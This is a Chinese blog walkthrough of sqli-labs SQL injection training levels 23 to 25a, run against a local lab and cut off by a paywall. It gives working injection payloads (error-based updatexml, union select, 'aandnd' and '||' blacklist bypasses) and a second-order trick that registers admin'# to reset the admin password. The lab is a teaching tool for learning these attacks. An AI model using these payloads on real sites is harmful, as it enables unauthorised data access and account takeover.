sqli-labs实战记录(二)

最新推荐文章于 2024-07-28 08:51:59 发布
最新推荐文章于 2024-07-28 08:51:59 发布
阅读量516 收藏
点赞数 1
分类专栏: SQL注入 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/82187983
版权
本文记录了在sqli-labs实战中遇到的各种过滤和防护,探讨了如何通过代码审计和技巧绕过WAF,包括双写、报错注入、盲注等方法。涉及Less-23至Less-37,总结了在不同场景下如黑名单、编码转换、HTTP参数污染等应对策略。
摘要由CSDN通过智能技术生成

Less-23

从这里开始应该是有做了防护,我们可以边看源代码练习代码审计,一边学习各种过waf的技巧了,这一题查看源代码的话发现注释符被过滤掉了

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

但其实对于这一句SQL语句,我们可以直接单引号闭合而不用注释去把后面的东西给省略掉

http://127.0.0.1/sqlilabs/Less-23/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) or '1'='1

直接报出数据库,此题完结

Less-24

这一题应该是设计二次注入的题目
在CTF题目里面的话肯定是要你获取admin的账号然后改变admin的密码用admin账号登录获取flag
这里主要关键是pass_change.php这里面的代码

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "

若我们在修改密码的时候
注册一个admin’#的用户就是为了后期能够使这一句话后面的内容全都注释的,从而直接更新的是admin的用户名
这时候的语句就会变成

UPDATE users SET PASSWORD='$pass' where username='admin'

改你想要密码,然后退出在直接用admin登录就好

Less-25

这一题看源代码会发现有一个黑名单

function blacklist($id)
{
   
    $id= preg_replace('/or/i',"", $id);           //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);       //Strip out AND (non case sensitive)

    return $id;
}

把or还有AND都会替换成为"",这里是大小写都会被拦截下来的
这时候其实可以有几个办法能够绕过

1)大小写变形Or,OR,oR2)编码,hex,urlencode
(3)添加注释/*or*/
(4)利用符号and=&& or=||
(5)双写绕过

输入一个单引号会出现单引号的报错,所以我们尝试闭合一下
http://127.0.0.1/sqlilabs/Less-25/?id=1%27 %23 成功出现回显

我这里选择用双写绕过

http://127.0.0.1/sqlilabs/Less-25/?id=1' aandnd updatexml(1,concat(0x7e,database(),0x7e),1) %23

符号绕过

http://127.0.0.1/sqlilabs/Less-25/?id=1' || updatexml(1,concat(0x7e,database(),0x7e),1) %23

Less-25a

跟上面一题同样的过滤方式,语句变简单了,不用单引号去闭合
但是这一题不能再用报错注入,因为源码中把报错信息给注释掉了,可以用盲注,我们需要用的是union注入或者是盲注
union注入

http://127.0.0.1/sqlilabs/Less-25a/?id=-1 union select 1,database(),3%23

再来一个二分法盲注,通过注入成功还会显示登录名这个标志

import requests
import time

url = '''http://127.0.0.1/sqlilabs/Less-25a/?id=1 aandnd ascii(substr(database(),{_},1))>{__}%23''
最低0.47元/天 解锁文章
0verWatch
关注
专栏目录
Sqli - labs实战笔记
浪子燕青的博客
02-25 505
Sqli - labs 安装与lesson1-4实战 所需环境: 1. PHP 2. MYSQL 3. Apache/Nginx 以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意: 1. Debian下的MySql每次登录的时候默认需要授权,即必须使用sudo,可以修改配置文件忽略默认授权,修改方法在之前的文件有提起过. 2. Apache存放文件放在/var/www/html/目录下 3. sqli-labs 使用的PHP5编写的,但是Debian默认安装PHP7,兼..
Sqli-Labs.zip
07-15
对前四道题目进行加强,输出在数据库中构成的查询语句,有利于新手快速入门SQLi;
sqli-labs实战记录(三)
0verWatch的博客
08-29 287
Less-38 从这一关开始其实就是堆叠注入,就是用分号连接两个不同的语句,然后执行这几条语句,进行增删改查,但是比赛中是不大会用的,但是对于这几个环境我还是偏向union注入所以我还是以union注入的方式显示 换了mysqli的连接方式,但是换汤不换药 直接单引号闭合就好了 http://192.168.100.103/sqlilabs/Less-38/?id=-1' union ...
SQL注入学习——sqli-labs通关(1-16)
最新发布
2402_82963715的博客
07-28 1686
​​​​​​​。
sqli-labs
公众号shadow sock7
03-21 230
1 "SELECT * FROM users WHERE id='$id' LIMIT 0,1" payload id=1' and sleep(5)-- cqq 2 "SELECT * FROM users WHERE id=$id LIMIT 0,1" payload id=1 and sleep(5)-- cqq 3 基于单引号和括号,可以选择两边都闭合括号,也可以用注释--,注意注...
sqli-labs实验环境
05-08
SQL注入SQL Injection)是一种常见的网络安全威胁...通过`sqli-labs`这样的实验环境,我们可以进行实战演练,提高安全防护意识和能力。在实际开发中,我们要时刻牢记数据安全,采用安全编程习惯,减少SQL注入的风险。
sqli-labs-master靶场
07-14
sqli-labs-master靶场提供了实战环境,让学习者能够实践各种SQL注入技巧,如盲注、时间基注入、union注入等,并了解如何修复这些漏洞。 靶场的结构通常包含以下部分: 1. **登录与注册模块**:这是最常见的SQL注入...
sqli-labs实战记录(一)
0verWatch的博客
08-29 3176
前言 最近啊先自己SQL注入确实不行,我只能拿出sql注入的基础部分来练练收了,这个实验环境是sqlilabs 一些前置知识 系统函数 介绍几个常用函数: 1. version()——MySQL 版本 2. user()——数据库用户名 3. database()——数据库名 4. @@datadir——数据库路径 5. @@version_compile_os——操作系统版本 字...
Sqli-labs
去无人的岛,摸鲨鱼的角
12-31 231
sqli-labs Less-1 1.寻找注入点 http://127.0.0.1/sqli/Less-1/?id=1' //报错 http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+ //正常 http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+ //报错 http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+ //报错,所以字段数是3 htt
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 1019
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
sqli-labs(一)
weixin_30593261的博客
08-18 94
第一关:第一关会讲的比较详细,后面的关卡中只有特殊的地方我会单独拿出来说。 第一关是一个很简单的string类型的sql注入,并且会报错,输入参数id=',页面会报错 值得注意的是: 1.报错信息中 near "1" limit 0,1' at line 1,但是我们输入的是1',所以说这半句中的单双引号和后台sql语句中的单双引号不是对应的关系,我们做测试的时候不能根据报错信息来判断...
SQLi-labs(SQL注入练习)
blalaa的博客
09-04 232
一、 Page-1(Basic Challenges) 【Less-1】 ①判断是否存在注入 输入参数,有输出 id=1’有报错,证明有注入点 ②猜解SQL查询语句中的字段数 Order by 3 正常: Order by 4 不正常: 所以字段数为3 ③确定显示的字段 2和3是显示位: ④获取当前数据库、版本 ⑤获取数据库中的表 ?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables wh
SQL注入
suqiban7253的博客
07-26 164
#1.次注入原理 次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL次注入。 也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是...
mysql 字段 i d_sqli-labs(1-10)
weixin_36187176的博客
02-27 180
前言:此文用于记录学习SQL注入过程中的所得所思,因为可以说是菜鸟了,需要参考大佬的解题方法,所以一切慢慢来吧,希望越来越强。做题过程中的各种知识在mysql数据库中,单行注释有#和--,在实际操作中#号一般用%23来表示。而--则用--+来表示。因为在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,而用--+代替--,原因是+在URL被URL编码后会变成空格。与数...
sqli-labs (less-65)
kukudeshuo的博客
03-20 469
sqli-labs (less-65) 进入65关,输入 http://127.0.0.1/sql1/Less-65/?id=1 http://127.0.0.1/sql1/Less-65/?id=1' http://127.0.0.1/sql1/Less-65/?id=1" 没有任何错误信息,依然还是万恶的Boolean盲注 http://127.0.0.1/sql1/Less-65/?id=1"--+ #回显错误 http://127.0.0.1/sql1/Less-65/?id=1")--
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6685
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
搭建本地SQL注入靶场:sqli-labs实战教程
"这篇教程将指导你安装sqli-labs,一个用于学习SQL注入的靶场。sqli-labs提供多样且最新的SQL漏洞环境,同时允许用户修改和审计源码,是网络安全初学者的理想实践平台。为了安全起见,推荐在本地环境而非公网服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值